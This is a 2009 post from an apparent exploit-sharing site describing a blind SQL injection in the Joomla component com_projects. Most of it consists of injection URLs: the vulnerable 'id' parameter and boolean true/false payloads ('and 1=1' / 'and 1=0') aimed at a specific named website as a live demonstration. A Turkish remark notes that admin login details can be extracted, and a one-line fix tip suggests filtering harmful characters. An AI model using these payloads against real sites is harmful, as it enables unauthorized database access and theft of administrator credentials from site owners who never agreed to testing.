Joomla Component com_projects ~ Blind SQL Inj. Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Joomla Component com_projects ~ Blind SQL Inj. Vuln.

Madde
	Author : Bug Researchers/Kadir DOGAN
	Date : 13.09.2009 19:52:11
	# Joomla Component com_projects ~ Blind SQL Inj. Vuln. [Full Screen Display]

	<------------------- header data start ------------------- > ############################################################# # author : Kadir DOGAN ~ Bug Researchers # Script Name : Joomla Component com_projects Blind SQL injection Vulnerability # Bug Type : SqL Injections # Infection : Admin login bilgileri alinabilir. # Demo Vuln. : TRUE(+) » http://www.oma.eu/index.php?option=com_projects&view=portal&id=456+and+1=1&Itemid=10 FALSE(-) » http://www.oma.eu/index.php?option=com_projects&view=portal&id=456+and+1=0&Itemid=10 # Bug Fix Advice : Zararli karakterler filtrelenmelidir. ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > path/index.php?option=com_projects&view=portal&id=[Blind SqL]&Itemid=[Number] < -- bug code end of -- >